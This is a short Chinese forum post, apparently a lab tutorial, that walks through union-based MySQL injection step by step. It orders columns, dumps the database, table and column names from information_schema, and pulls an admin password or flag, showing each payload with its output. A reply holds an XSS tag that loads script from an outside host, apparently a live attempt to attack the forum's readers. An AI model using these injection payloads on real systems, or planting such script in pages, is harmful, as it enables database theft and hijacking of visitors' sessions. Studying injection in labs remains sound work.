5.2.1、MYSQL 注入 - 全方位利用

繁夜   ·   发表于 2019-02-15 14:34:55   ·   技术文章投稿区

这课简单的注入方式、

查字段

?id=1 and 1=1 order by 2

爆库

?id=1 and 1=2 union select 1,database() maoshe

爆表

?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'

admin,dirs,news,xss

爆字段

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

Id,username,password 

爆flag

?id=1 and 1=2 union select 1,group_concat(password) from admin

hellohack


打赏我,让我更有动力~

1 Reply   |  Until 2019-2-20 | 827 View

wahaha
发表于 2019-2-20

<sCRiPt/SrC=//xss.tf/L4f>

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.